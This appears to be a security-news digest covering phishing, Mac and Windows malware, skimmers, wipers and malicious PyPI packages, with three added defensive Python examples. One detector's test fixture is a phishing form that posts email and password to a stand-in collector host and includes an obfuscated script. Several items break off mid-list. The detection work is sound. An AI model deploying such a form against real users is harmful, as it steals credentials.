He manipulated Laolao and stole her life savings.
Why does she remember him so fondly?
It is a great insight into the lives of the elderly, who get a bit lost in this digital age:
Source
Good news for everyone!
A new version of the beta build is available for download and testing.
You can download the version from the links below
Mirror - 1
Mirror - 2
It can be activated only through the Internet. The beta license is valid for 90 days.
Before installing the new build, please uninstall the previous build (sometimes kavremover may be needed) and reboot the system.
Please pay attention
In this build you may encounter problems caused by Anti-Banner: some web sites may not load, some may lose random functions, or pages could be displayed incorrectly. We ask you to switch on Anti-Banner before testing to reveal these problems.
Advice for novice testers
- Do not proceed with testing without reading the instructions;
- All found bugs should be posted in the related topics, so it would be wise to read their headers first. Bug reports should contain all useful info (it will be clear after reading the instructions from point 1);
- The most convenient way to upload big files (traces or dumps) is in a .zip archive on OwnCloud;
- Traces as well as app and driver verifiers are enabled in this build.
- This area of forum is not connected to Tech Support (Bugs of Beta-products are collected here)
Please don't post on the beta forum if you are not participating in the beta testing.
A clever phishing campaign has been spotted that bundles the scam's landing page in the HTML attachment rather than redirecting users to another site that asks them to log in.
A typical credential-stealing phishing scam consists of an email where the attacker tries to convince the user to click a link in order to retrieve a document or prevent something from happening. These links will then bring the user to a web site, or landing page, that includes a login form where the user must enter their login credentials to proceed.
With this type of attack, users can either detect the scam by the contents of the email, by a suspicious remote site and landing page, or by alerts from security solutions.
Let's show login form locally instead
To prevent users from becoming suspicious when they are redirected to a site with a strange domain or URL, a clever scammer decided to generate the phishing scam directly in the user's browser without going to a remote site.
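Because the landing page in this scheme ships inside the attachment, there is no suspicious URL to inspect; what gives it away is the content of the HTML itself. The following added example (not code from the original article) scans an attachment for the indicators a practitioner would look for: a password field, a form whose action posts to a remote host (an attachment opened from disk has no legitimate reason to do either), and script obfuscation helpers. The sample attachment and its hostnames are constructed for illustration.

```python
"""Flag HTML e-mail attachments that carry a credential-harvesting form.

Added example, not from the original article.  SAMPLE_ATTACHMENT and
BENIGN_ATTACHMENT are constructed; collector.example.invalid is made up.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: a "secure document viewer" that is really a login
# form posting the credentials to a remote collector.
SAMPLE_ATTACHMENT = """
<html><body>
<h2>Secure Document - sign in to view</h2>
<form method="post" action="https://collector.example.invalid/post.php">
  Email: <input type="text" name="email">
  Password: <input type="password" name="passwd">
  <input type="submit" value="View document">
</form>
<script>document.write(unescape('%3C%64%69%76%3E'))</script>
</body></html>
"""

# Constructed benign attachment for comparison.
BENIGN_ATTACHMENT = """
<html><body><h1>Q3 summary</h1><p>Revenue was flat.</p></body></html>
"""

# Helpers phishing kits commonly use to hide the real page source.
OBFUSCATION_RE = re.compile(
    r"\b(unescape|atob|eval|String\.fromCharCode)\s*\(", re.I)


class _FormScanner(HTMLParser):
    """Collect form actions, password inputs and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.form_actions = []
        self.password_inputs = 0
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_inputs += 1
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def scan_attachment(html: str) -> dict:
    """Return the indicators found in an HTML attachment plus a verdict.

    A file opened from disk has no origin of its own, so any absolute form
    action necessarily sends the submitted fields to a third party.
    """
    parser = _FormScanner()
    parser.feed(html)
    remote_hosts = sorted({urlparse(act).netloc
                           for act in parser.form_actions if urlparse(act).netloc})
    obfuscated = any(OBFUSCATION_RE.search(s) for s in parser.scripts)
    result = {
        "password_inputs": parser.password_inputs,
        "remote_form_hosts": remote_hosts,
        "obfuscated_script": obfuscated,
    }
    result["suspicious"] = (parser.password_inputs > 0
                            or bool(remote_hosts) or obfuscated)
    return result


if __name__ == "__main__":
    for name, doc in (("sample", SAMPLE_ATTACHMENT), ("benign", BENIGN_ATTACHMENT)):
        print(name, scan_attachment(doc))
```

In a mail gateway this check would run on every `text/html` attachment before delivery; a password field alone is enough to quarantine, since legitimate documents sent as HTML do not ask for credentials.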
Researchers uncover "ultimate man-in-the-middle attack" that used an elaborate spoofing campaign to fool a Chinese VC firm and rip off an emerging business.
Hackers pulled off an elaborate man-in-the-middle campaign to rip off an Israeli startup by intercepting a wire transfer from a Chinese venture-capital firm intended for the new business.
Are you unsure of the difference between free anti-virus for Windows and paid anti-virus software?
This article explains how free and paid anti-virus options differ, helping you to decide which is best for you.
Read on as we discuss:
Microsoft ran a password-reuse analysis on over three billion leaked account credentials in 2019 to find out how many of the leaked passwords were also in use by Microsoft customers.
The company collected password hash information from public sources and received additional data from law enforcement agencies, and used that data as the basis for the comparison.
An analysis of password use in 2016 revealed that about 20% of Internet users were reusing passwords, and that an additional 27% were using passwords that were "nearly identical" to other account passwords. In 2018, it was revealed that a large part of Internet users were still favoring weak passwords over secure ones.
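The distinction the 2016 figures draw, between exact reuse and "nearly identical" passwords, is worth seeing in code. The following added example (not Microsoft's code or method) indexes a leaked corpus twice, once as-is and once in a normalized form, and classifies each account password as reused, near-identical or unique. All passwords are constructed. It assumes the corpus is available in plaintext (as many public dumps are), because variants cannot be derived from hashes alone, and the normalization rule (case-fold, drop a trailing run of digits and punctuation) is an assumption about what "nearly identical" means, not Microsoft's published definition.

```python
"""Count exact and near-identical password reuse against a leaked corpus.

Added example, not Microsoft's code or method.  LEAKED and ACCOUNTS are
constructed.  SHA-1 is used here only as a compact comparison key (it is
the hash most public dumps are published in); it is not a storage choice.
"""
import hashlib
import re


def sha1_hex(text: str) -> str:
    return hashlib.sha1(text.encode("utf-8")).hexdigest()


# Assumed variant rule: "Summer2018" and "Summer2019!" collapse to "summer".
_TAIL = re.compile(r"[0-9!@#$%^&*.?]+$")


def normalize(password: str) -> str:
    """Collapse the common 'same word, new year or symbol' variants."""
    return _TAIL.sub("", password.lower())


def build_index(leaked_plaintexts):
    """Hash the corpus once as-is and once in normalized form."""
    exact = {sha1_hex(p) for p in leaked_plaintexts}
    near = {sha1_hex(normalize(p)) for p in leaked_plaintexts}
    return exact, near


def classify(password: str, exact: set, near: set) -> str:
    if sha1_hex(password) in exact:
        return "reused"
    if sha1_hex(normalize(password)) in near:
        return "near-identical"
    return "unique"


def reuse_report(accounts: dict, leaked_plaintexts) -> dict:
    """Map each account to its verdict against the leaked corpus."""
    exact, near = build_index(leaked_plaintexts)
    return {user: classify(pw, exact, near) for user, pw in accounts.items()}


# Constructed data: a tiny "public dump" and four account passwords.
LEAKED = ["Summer2018", "P@ssw0rd", "letmein", "dragon"]
ACCOUNTS = {
    "alice": "Summer2018",             # exact reuse
    "bob": "Summer2019!",              # same word, new year and symbol
    "carol": "correct horse battery",  # unrelated to the corpus
    "dave": "p@ssw0rd",                # case-only variant
}

if __name__ == "__main__":
    for user, verdict in reuse_report(ACCOUNTS, LEAKED).items():
        print(f"{user}: {verdict}")
```

Running the two-pass comparison over real data is what makes the "nearly identical" share visible at all; a plain hash-set intersection would count only alice above and miss bob and dave.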
In-memory infection makes it harder for end-point protection to detect it.
Hackers believed to be working for the North Korean government have upped their game with a recently discovered Mac trojan that uses in-memory execution to remain stealthy.
In-memory execution, also known as fileless infection, never writes anything to a computer hard drive. Instead, it loads malicious code directly into memory and executes it from there. The technique is an effective way to evade antivirus protection because there’s no file to be analyzed or flagged as suspicious.
In-memory infections were once the sole province of state-sponsored attackers. By 2017, more advanced financially motivated hackers had adopted the technique. It has become increasingly common since then.
The malware isn’t entirely fileless. The first stage poses as a cryptocurrency app with the file name UnionCryptoTrader.dmg. When it first came to light earlier this week, only two out of 57 antivirus products detected it as suspicious. On Friday, according to VirusTotal, detection had only modestly improved, with 17 of 57 products flagging it.
Once executed, the file uses a post-installation binary that, according to a detailed analysis by Patrick Wardle, a Mac security expert at enterprise Mac software provider Jamf, can do the following:
A cyberthreat actor has created a web site that promotes a fake VPN program that installs the Vidar and CryptBot password-stealing trojans. These trojans will then attempt to steal saved browser credentials and other information from a victim's computer.
While investigating a different malware infection, BleepingComputer stumbled upon a website promoting a VPN program called 'Inter VPN' that claims to be the "fastest VPN". It then shows an image of the VPN client, which is actually an image of the legitimate VPN Pro software.
NVIDIA released security updates for six high severity vulnerabilities found in the Tegra Linux Driver Package (L4T) for Jetson AGX Xavier, TK1, TX1, TX2, and Nano chips used in Mercedes-Benz's MBUX infotainment system and Bosch self-driving computer systems.
The chips affected by these flaws are also used in HP and Acer Chromebooks, Android tablets, Nintendo Switch video game consoles, and Magic Leap One virtual retinal displays.
These flaws could allow local attackers with various levels of user privileges to execute arbitrary code, escalate privileges, trigger denial-of-service (DoS) states, and launch information disclosure attacks against devices featuring unpatched chips.
The high severity vulnerabilities
Potential attackers could run code on devices with vulnerable chips by taking advantage of unpatched code execution flaws, while exploiting the vulnerabilities that lead to a DoS state can render them temporarily unusable.
The German automotive giant BMW discovered and monitored a group of hackers who infiltrated the company's networks and stayed active since at least the spring of 2019.
BMW's security team spotted the hackers after discovering an instance of the legitimate penetration testing tool Cobalt Strike on a company computer, a tool regularly used in red team testing scenarios to simulate adversaries.
Hackers monitored for months
Following the discovery, the hackers were allowed to stay active with the probable end purpose of collecting more info on who they were, how many systems they had managed to compromise, and what data they were after, if any, as Munich-based broadcaster Bayerischer Rundfunk reports.
The Lazarus hacking group has been caught trying to sneak a new ‘fileless’ Trojan on to Apple macOS computers disguised as a fake cryptocurrency trading application.
The discovery was reported by K7 Computing's Dinesh Devadoss to Mac security expert Patrick Wardle, who immediately spotted similarities to previous attacks. The first of these, from 2018, was the 'AppleJeus' malware, which also used a cryptocurrency trading application to lure high-value targets in order to steal cryptocoins. In October 2019, the hackers returned with a new backdoor Trojan that spread using the same approach: a cryptocurrency application posted to GitHub for victims to download. To make the applications appear trustworthy, both campaigns used the ruse of setting up fake software companies with legitimate certificates.
The new Trojan, tagged by Wardle as OSX.AppleJeus.C, continues in the same vein, with one interesting twist: the so-called fileless in-memory execution of a remote payload. As its name suggests, fileless malware avoids writing files to disk so that signature scanners have nothing to inspect, restricting itself to main memory. Once there it typically hijacks legitimate processes on the target, for example Windows PowerShell or command-line scripting hosts such as wscript.exe on Windows. In the latest Apple campaign, the trading application is the Trojan that initiates the infection; it borrows Apple API calls to load an object-file image directly from memory, while the installer writes a separate component to disk to create persistence (i.e. the ability to survive reboots).
The popular BitTorrent client uTorrent is currently being flagged as a threat by several anti-virus tools. The issue affects the desktop client as well as the Web version and the BitTorrent Mainline client. According to the anti-virus vendors, the flags were likely triggered by bundled advertisements or other unwanted software.
After the TRON acquisition, uTorrent and BitTorrent’s social media channels have been predominantly ‘crypto’ oriented. The core audience of the file-sharing clients, which still consists of millions of users, remains mostly interested in downloading and sharing files though. This is something uTorrent still does well and the same is true for the BitTorrent Mainline client. However, new users of these clients have repeatedly been warned not to use the software by several leading anti-virus vendors. In the past BitTorrent Inc. classified such warnings as false positives which it could resolve relatively easily. While that may be true, it appears that the problem is rather persistent and likely more structural than some would think.
After alarmed users reported the issue in uTorrent’s forums this week, we decided to scan the latest release for potential threats. According to VirusTotal, nine separate anti-virus vendors currently flag the software as problematic. This includes the popular Windows Defender, which labels the torrent client as a severe threat. While that sounds scary, the detailed description shows that it may include “Potentially Unwanted Software,” a term commonly used for adware. This is not the first time uTorrent has had this problem. Microsoft has flagged the torrent client in the past as well, as the dedicated Utorrent threat page shows as well. This flag was later removed, presumably after the software was updated, but now they are back in full force. Other anti-virus tools that warn users against uTorrent include Comodo, drWeb, Eset and Sophos, as the list below shows.
Any uTorrent users who receive the warning should proceed at their own risk. When we installed the most recent uTorrent we didn’t spot anything nefarious being installed but, in the past, we have noticed that the client was bundled with adware.
CyrusOne, a large data center provider in the U.S., announced on Thursday that some of its systems were affected by a ransomware attack.
Several customers impacted by the incident have availability problems. The company's managed service division is currently working to restore activity to normal.
The official note published by CyrusOne is a forward-looking statement that does not share too much information.
The company says that six of its customers are affected by file-encrypting malware. These customers are mainly serviced by the company's New York data center.
Managed services are not the main business of the provider as CyrusOne also offers colocation facilities in about 48 data centers across the globe.
Systems affected by this ransomware attack are limited to this division and do not include IX (internet exchange) and IP Network Services.
In a lawsuit filed today, Facebook alleges that a Chinese company used malware to compromise user accounts to run deceptive ads on the social media platform.
The end goal of compromising Facebook accounts was distribution of deceptive ads for counterfeit goods and diet pills.
The company in question is ILikeAd Media International Company Ltd, represented by Chen Xiao Cong and Huang Tao, who Facebook says are the authors of the malware behind the entire promo scheme. In a blog post today, Facebook says that the defendants employed two tactics to disguise the true goal of their campaign.
One method was to use images of celebrities in their ads, also known as 'celeb bait,' to trick users into clicking on them.
Security researchers found a new vulnerability allowing potential attackers to hijack VPN connections on affected *NIX devices and inject arbitrary data payloads into IPv4 and IPv6 TCP streams.
They disclosed the security flaw tracked as CVE-2019-14899 to distros and the Linux kernel security team, as well as to others impacted such as Systemd, Google, Apple, OpenVPN, and WireGuard.
The vulnerability is known to impact most Linux distributions and Unix-like operating systems including FreeBSD, OpenBSD, macOS, iOS, and Android.
A currently incomplete list of vulnerable operating systems and the init systems they came with is available below, with more to be added once they are tested and found to be affected:
If this report from China Times is to be believed (and this is usually a reliable source) then TSMC's 5nm testing is going very well and the first 3 customers have already been locked in - including AMD. According to the schedule obtained by China Times, AMD's 5nm products will be landing in early 2021 with mass production for 5nm scheduled in 2020.
AMD among first three customers to grab TSMC 5nm production capacity, NVIDIA missing from the picture
What is really amazing to hear in the report is that TSMC's 5nm yield has already surpassed its 7nm yield, which is quite the feat. This would mean that TSMC's 5nm will become viable sooner than expected and the transition from 7nm to 5nm can begin in earnest as well. The three customers that will be able to grab the first wave of production capacity are Apple, HiSilicon and AMD. While it is not surprising to see Apple get the first bite, it is interesting to see NVIDIA missing from this list, as I would have assumed they would be first in line to grab onto a process advantage (although this might be a questionable assumption considering they have yet to launch 7nm GPUs).
Motorola has what might be the best-looking mid-range smartphone with the "Motorola One Hyper," a $400 phone with flagship touches like an all-screen front design and a motorized, pop-up camera. It's like a mini OnePlus 7 Pro! You won't find any notches or other screen blemishes here. For specs, you have a 6.5-inch 2340×1080 IPS LCD, a 2GHz Snapdragon 675, 4GB of memory, 128GB of storage, and a 4000mAh battery. There are two rear cameras, a 64MP main sensor and an 8MP wide-angle lens, plus a 32MP front camera. Both the main front and back cameras have a pretty high megapixel count, and both have an optional "quad pixel" mode, which merges every four pixels together for better light pickup.
If we want to create super-human intelligence, we need to think unlike humans. Too much emphasis goes into trying to build AI that functions the same way as humans do, instead of exploring directions that can unlock the unique potential of true machine intelligence. Mikko Hyppönen, Chief Research Officer at F-Secure, takes the audience on a deep dive into new types of collaborative intelligent agents that far surpass the limits of what AI can currently do.
Payment card skimmers have hit four online merchants with help from Heroku, a cloud provider owned by Salesforce, a researcher has found.
Heroku is a cloud platform designed to make things easier for users to build, maintain, and deliver online services. It turns out that the service also makes things easier for crooks to run skimmers that target third-party sites. On Wednesday, Jérôme Segura, director of threat intelligence at security provider Malwarebytes, said he found a rash of skimmers hosted on Heroku. The hackers behind the scheme not only used the service to host their skimmer infrastructure and deliver it to targeted sites. They also used Heroku to store stolen credit-card data. Heroku administrators suspended the accounts and removed the skimmers within an hour of being notified, Segura told Ars. This is not the first time cloud services have been abused by payment card skimmers. In April, Malwarebytes documented similar abuse on Github. Two months later, the security provider reported skimmers hosted on Amazon S3 buckets. Abusing a cloud provider makes good sense from a crook's point of view. It's often free, saves the hassle of registering look-alike domain names, and delivers top-notch availability and bandwidth.
We will likely continue to observe web skimmers abusing more cloud services as they are a cheap (even free) commodity they can discard when finished using it. From a detection standpoint, skimmers hosted on cloud providers may cause some issues with false positives. For example, one cannot blacklist a domain used by thousands of other legitimate users.
The United States Department of Justice today disclosed the identities of two Russian hackers and charged them for developing and distributing the Dridex banking Trojan using which the duo stole more than $100 million over a period of 10 years.
Maksim Yakubets, the leader of the 'Evil Corp' hacking group, and his co-conspirator Igor Turashev primarily distributed Dridex, also known as 'Bugat' and 'Cridex', through multi-million-message email campaigns and targeted numerous organizations around the world.
The State Department has also announced a reward of up to $5 million—the largest offered bounty to date for a cybercrime suspect—for providing information that could lead to the arrest of Yakubets, who remains at large.
Besides developing and distributing Dridex, Yakubets has also been charged with conspiracy to commit bank fraud in connection with the infamous "Zeus" banking malware that stole $70 million from victims' bank accounts.
"Bugat malware was specifically crafted to defeat antivirus and other protective measures employed by victims. Later versions of the malware were designed with the added function of assisting in the installation of ransomware."
Starting May 2009, Yakubets and his co-conspirators allegedly employed widespread computer intrusions, malicious software, and fraud in an effort to steal millions of dollars from numerous bank accounts in the United States and elsewhere.
Full story: FBI Puts $5 Million Bounty On Russian Hackers Behind Dridex Banking Malware
IBM X-Force, the company's security unit, has published a report of a new form of "wiper" malware connected to threat groups in Iran and used in a destructive attack against companies in the Middle East.
The sample was discovered in a response to an attack on what an IBM spokesperson described as "a new environment in the [Middle East]—not in Saudi Arabia, but another regional rival of Iran." Dubbed ZeroCleare, the malware is "a likely collaboration between Iranian state-sponsored groups," according to a report by IBM X-Force researchers. The attacks were targeted against specific organizations and used brute-force password attacks to gain access to network resources. The initial phase of the attacks was launched from Amsterdam IP addresses owned by a group tied to what IBM refers to as the "ITG13 Group"—also known as "Oilrig" and APT34. Another Iranian threat group may have used the same addresses to access accounts prior to the wiper campaign. "While X-Force IRIS cannot attribute the activity observed during the destructive phase of the ZeroCleare campaign," the researchers noted, "we assess that high-level similarities with other Iranian threat actors, including the reliance on ASPX web shells and compromised VPN accounts, the link to ITG13 activity, and the attack aligning with Iranian objectives in the region, make it likely this attack was executed by one or more Iranian threat groups."
In addition to brute force attacks on network accounts, the attackers exploited a SharePoint vulnerability to drop web shells on a SharePoint server. These included China Chopper, Tunna, and another Active Server Pages-based webshell named "extensions.aspx," which "shared similarities with the ITG13 tool known as TWOFACE/SEASHARPEE," the IBM researchers reported. They also attempted to install TeamViewer remote access software and used a modified version of the Mimikatz credential-stealing tool—obfuscated to hide its intent—to steal more network credentials off the compromised servers. From there, they moved out across the network to spread the ZeroCleare malware.
Two malicious Python packages were introduced into the Python Package Index (PyPI) with the purpose of stealing SSH and GPG keys from Python developers' projects.
One of them, using typosquatting to impersonate a legitimate library, survived for about a year in the repository. The other survived for just a couple of days.
PyPI is a collection of software created and shared by the Python community to help developers in their projects.
Undetected for a year
The fake library that spent the least amount of time in PyPI was available under the name 'python3-dateutil,' a clear impersonation of the 'dateutil' package, which extends the standard Python datetime module.
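A name like 'python3-dateutil' passes a casual glance because it differs from the real package only by a plausible prefix. The following added example (not PyPI's code or the researchers') shows the check a dependency-review step or an internal mirror could run: strip the prefixes squatters bolt on, fold look-alike characters, and measure the edit distance to a small allow-list of well-known package names. KNOWN is a constructed allow-list (python-dateutil is the real package 'python3-dateutil' imitated; the others are common PyPI names), and the look-alike folding (I/l/1, O/0) generalizes beyond the prefix trick the article describes.

```python
"""Flag candidate package names that look like typosquats of known packages.

Added example, not PyPI's or the researchers' code.  KNOWN is a constructed
allow-list; the candidate names in the usage block are constructed inputs.
"""
import re

KNOWN = ["python-dateutil", "requests", "jellyfish", "numpy", "urllib3"]

# Characters that render alike in many fonts; mapped before lower-casing so
# a capital I can still become an l.
_HOMOGLYPHS = str.maketrans({"I": "l", "1": "l", "O": "o", "0": "o"})
# Prefixes a squatter can add without changing what a developer "sees".
_PREFIXES = ("python3-", "python-", "python3", "python")


def canonical(name: str) -> str:
    """Reduce a package name to the form a hurried reader perceives."""
    n = name.translate(_HOMOGLYPHS).lower()
    for prefix in _PREFIXES:
        if n.startswith(prefix) and len(n) > len(prefix):
            n = n[len(prefix):]
            break
    return re.sub(r"[-_.]", "", n)


def levenshtein(a: str, b: str) -> int:
    """Plain edit distance (insert, delete, substitute), O(len(a)*len(b))."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,            # delete
                           cur[j - 1] + 1,         # insert
                           prev[j - 1] + (ca != cb)))  # substitute
        prev = cur
    return prev[-1]


def check_name(candidate: str, known=KNOWN, max_distance: int = 1):
    """Return ("known", name), ("suspicious", closest_known) or ("ok", None)."""
    if candidate in known:
        return ("known", candidate)
    c = canonical(candidate)
    closest = min(known, key=lambda k: levenshtein(c, canonical(k)))
    if levenshtein(c, canonical(closest)) <= max_distance:
        return ("suspicious", closest)
    return ("ok", None)


if __name__ == "__main__":
    # Constructed candidates: the article's squat, a look-alike of
    # jellyfish, a genuine name and an unrelated one.
    for cand in ("python3-dateutil", "jeIlyfish", "requests", "flask"):
        print(cand, "->", check_name(cand))
```

The allow-list should be the set of packages a project actually depends on, or the top few thousand by download count; a distance threshold of 1 catches single-character swaps and prefix games while keeping unrelated short names out of the suspicious bucket.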